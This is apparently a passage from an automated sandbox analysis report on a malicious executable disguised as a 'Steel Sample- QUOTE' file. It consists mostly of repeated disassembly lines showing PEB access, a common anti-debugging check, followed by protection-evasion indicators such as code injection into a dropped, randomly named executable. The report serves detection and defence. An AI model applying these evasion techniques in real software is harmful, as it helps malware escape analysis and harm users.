            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]6_2_3524B6C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]6_2_3524B6C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]6_2_3524B6C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B6C0 mov eax, dword ptr fs:[00000030h]6_2_3524B6C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FF6C7 mov eax, dword ptr fs:[00000030h]6_2_352FF6C7
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352716CF mov eax, dword ptr fs:[00000030h]6_2_352716CF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353016CC mov eax, dword ptr fs:[00000030h]6_2_353016CC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353016CC mov eax, dword ptr fs:[00000030h]6_2_353016CC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353016CC mov eax, dword ptr fs:[00000030h]6_2_353016CC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353016CC mov eax, dword ptr fs:[00000030h]6_2_353016CC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35317120 mov eax, dword ptr fs:[00000030h]6_2_35317120
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35241131 mov eax, dword ptr fs:[00000030h]6_2_35241131
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35241131 mov eax, dword ptr fs:[00000030h]6_2_35241131
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B136 mov eax, dword ptr fs:[00000030h]6_2_3523B136
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B136 mov eax, dword ptr fs:[00000030h]6_2_3523B136
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B136 mov eax, dword ptr fs:[00000030h]6_2_3523B136
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B136 mov eax, dword ptr fs:[00000030h]6_2_3523B136
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F172 mov eax, dword ptr fs:[00000030h]6_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D9179 mov eax, dword ptr fs:[00000030h]6_2_352D9179
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315152 mov eax, dword ptr fs:[00000030h]6_2_35315152
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239148 mov eax, dword ptr fs:[00000030h]6_2_35239148
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239148 mov eax, dword ptr fs:[00000030h]6_2_35239148
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239148 mov eax, dword ptr fs:[00000030h]6_2_35239148
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239148 mov eax, dword ptr fs:[00000030h]6_2_35239148
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D3140 mov eax, dword ptr fs:[00000030h]6_2_352D3140
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D3140 mov eax, dword ptr fs:[00000030h]6_2_352D3140
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D3140 mov eax, dword ptr fs:[00000030h]6_2_352D3140
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35247152 mov eax, dword ptr fs:[00000030h]6_2_35247152
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F11A4 mov eax, dword ptr fs:[00000030h]6_2_352F11A4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F11A4 mov eax, dword ptr fs:[00000030h]6_2_352F11A4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F11A4 mov eax, dword ptr fs:[00000030h]6_2_352F11A4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F11A4 mov eax, dword ptr fs:[00000030h]6_2_352F11A4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525B1B0 mov eax, dword ptr fs:[00000030h]6_2_3525B1B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F5180 mov eax, dword ptr fs:[00000030h]6_2_352F5180
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F5180 mov eax, dword ptr fs:[00000030h]6_2_352F5180
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35297190 mov eax, dword ptr fs:[00000030h]6_2_35297190
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352651EF mov eax, dword ptr fs:[00000030h]6_2_352651EF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352451ED mov eax, dword ptr fs:[00000030h]6_2_352451ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353131E1 mov eax, dword ptr fs:[00000030h]6_2_353131E1
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E71F9 mov esi, dword ptr fs:[00000030h]6_2_352E71F9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527D1D0 mov eax, dword ptr fs:[00000030h]6_2_3527D1D0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527D1D0 mov ecx, dword ptr fs:[00000030h]6_2_3527D1D0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353151CB mov eax, dword ptr fs:[00000030h]6_2_353151CB
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530903E mov eax, dword ptr fs:[00000030h]6_2_3530903E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530903E mov eax, dword ptr fs:[00000030h]6_2_3530903E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530903E mov eax, dword ptr fs:[00000030h]6_2_3530903E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530903E mov eax, dword ptr fs:[00000030h]6_2_3530903E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C106E mov eax, dword ptr fs:[00000030h]6_2_352C106E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315060 mov eax, dword ptr fs:[00000030h]6_2_35315060
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov ecx, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251070 mov eax, dword ptr fs:[00000030h]6_2_35251070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352BD070 mov ecx, dword ptr fs:[00000030h]6_2_352BD070
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E705E mov ebx, dword ptr fs:[00000030h]6_2_352E705E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E705E mov eax, dword ptr fs:[00000030h]6_2_352E705E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526B052 mov eax, dword ptr fs:[00000030h]6_2_3526B052
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CD080 mov eax, dword ptr fs:[00000030h]6_2_352CD080
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CD080 mov eax, dword ptr fs:[00000030h]6_2_352CD080
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523D08D mov eax, dword ptr fs:[00000030h]6_2_3523D08D
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35245096 mov eax, dword ptr fs:[00000030h]6_2_35245096
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526D090 mov eax, dword ptr fs:[00000030h]6_2_3526D090
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526D090 mov eax, dword ptr fs:[00000030h]6_2_3526D090
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527909C mov eax, dword ptr fs:[00000030h]6_2_3527909C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352650E4 mov eax, dword ptr fs:[00000030h]6_2_352650E4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352650E4 mov ecx, dword ptr fs:[00000030h]6_2_352650E4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov ecx, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov ecx, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov ecx, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov ecx, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C0 mov eax, dword ptr fs:[00000030h]6_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353150D9 mov eax, dword ptr fs:[00000030h]6_2_353150D9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352BD0C0 mov eax, dword ptr fs:[00000030h]6_2_352BD0C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352BD0C0 mov eax, dword ptr fs:[00000030h]6_2_352BD0C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352690DB mov eax, dword ptr fs:[00000030h]6_2_352690DB
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526F32A mov eax, dword ptr fs:[00000030h]6_2_3526F32A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35237330 mov eax, dword ptr fs:[00000030h]6_2_35237330
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530132D mov eax, dword ptr fs:[00000030h]6_2_3530132D
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530132D mov eax, dword ptr fs:[00000030h]6_2_3530132D
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C930B mov eax, dword ptr fs:[00000030h]6_2_352C930B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C930B mov eax, dword ptr fs:[00000030h]6_2_352C930B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C930B mov eax, dword ptr fs:[00000030h]6_2_352C930B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FF367 mov eax, dword ptr fs:[00000030h]6_2_352FF367
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35247370 mov eax, dword ptr fs:[00000030h]6_2_35247370
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35247370 mov eax, dword ptr fs:[00000030h]6_2_35247370
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35247370 mov eax, dword ptr fs:[00000030h]6_2_35247370
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E3370 mov eax, dword ptr fs:[00000030h]6_2_352E3370
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523D34C mov eax, dword ptr fs:[00000030h]6_2_3523D34C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523D34C mov eax, dword ptr fs:[00000030h]6_2_3523D34C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239353 mov eax, dword ptr fs:[00000030h]6_2_35239353
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239353 mov eax, dword ptr fs:[00000030h]6_2_35239353
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315341 mov eax, dword ptr fs:[00000030h]6_2_35315341
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352633A5 mov eax, dword ptr fs:[00000030h]6_2_352633A5
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352733A0 mov eax, dword ptr fs:[00000030h]6_2_352733A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352733A0 mov eax, dword ptr fs:[00000030h]6_2_352733A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E13B9 mov eax, dword ptr fs:[00000030h]6_2_352E13B9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E13B9 mov eax, dword ptr fs:[00000030h]6_2_352E13B9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E13B9 mov eax, dword ptr fs:[00000030h]6_2_352E13B9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3531539D mov eax, dword ptr fs:[00000030h]6_2_3531539D
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3529739A mov eax, dword ptr fs:[00000030h]6_2_3529739A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3529739A mov eax, dword ptr fs:[00000030h]6_2_3529739A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FF3E6 mov eax, dword ptr fs:[00000030h]6_2_352FF3E6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353153FC mov eax, dword ptr fs:[00000030h]6_2_353153FC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FB3D0 mov ecx, dword ptr fs:[00000030h]6_2_352FB3D0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315227 mov eax, dword ptr fs:[00000030h]6_2_35315227
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35277208 mov eax, dword ptr fs:[00000030h]6_2_35277208
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35277208 mov eax, dword ptr fs:[00000030h]6_2_35277208
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35269274 mov eax, dword ptr fs:[00000030h]6_2_35269274
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35281270 mov eax, dword ptr fs:[00000030h]6_2_35281270
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35281270 mov eax, dword ptr fs:[00000030h]6_2_35281270
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530D26B mov eax, dword ptr fs:[00000030h]6_2_3530D26B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530D26B mov eax, dword ptr fs:[00000030h]6_2_3530D26B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239240 mov eax, dword ptr fs:[00000030h]6_2_35239240
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239240 mov eax, dword ptr fs:[00000030h]6_2_35239240
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527724D mov eax, dword ptr fs:[00000030h]6_2_3527724D
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FB256 mov eax, dword ptr fs:[00000030h]6_2_352FB256
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FB256 mov eax, dword ptr fs:[00000030h]6_2_352FB256
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352552A0 mov eax, dword ptr fs:[00000030h]6_2_352552A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352552A0 mov eax, dword ptr fs:[00000030h]6_2_352552A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352552A0 mov eax, dword ptr fs:[00000030h]6_2_352552A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352552A0 mov eax, dword ptr fs:[00000030h]6_2_352552A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D72A0 mov eax, dword ptr fs:[00000030h]6_2_352D72A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D72A0 mov eax, dword ptr fs:[00000030h]6_2_352D72A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C92BC mov eax, dword ptr fs:[00000030h]6_2_352C92BC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C92BC mov eax, dword ptr fs:[00000030h]6_2_352C92BC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C92BC mov ecx, dword ptr fs:[00000030h]6_2_352C92BC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C92BC mov ecx, dword ptr fs:[00000030h]6_2_352C92BC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353092A6 mov eax, dword ptr fs:[00000030h]6_2_353092A6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353092A6 mov eax, dword ptr fs:[00000030h]6_2_353092A6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353092A6 mov eax, dword ptr fs:[00000030h]6_2_353092A6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353092A6 mov eax, dword ptr fs:[00000030h]6_2_353092A6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315283 mov eax, dword ptr fs:[00000030h]6_2_35315283
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527329E mov eax, dword ptr fs:[00000030h]6_2_3527329E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527329E mov eax, dword ptr fs:[00000030h]6_2_3527329E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe; Section loaded: NULL target: C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\4KXbBCJB2PUOofMF0XAGHYJ.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe; Process created: C:\Users\user\Desktop\Steel Sample- QUOTE.exe "C:\Users\user\Desktop\Steel Sample- QUOTE.exe"
            Source: 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000002.2964256882.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000000.2533935478.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000F.00000002.2964318735.0000000001A80000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000002.2964256882.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000000.2533935478.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000F.00000002.2964318735.0000000001A80000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
            Source: 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000002.2964256882.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000000.2533935478.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000F.00000002.2964318735.0000000001A80000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
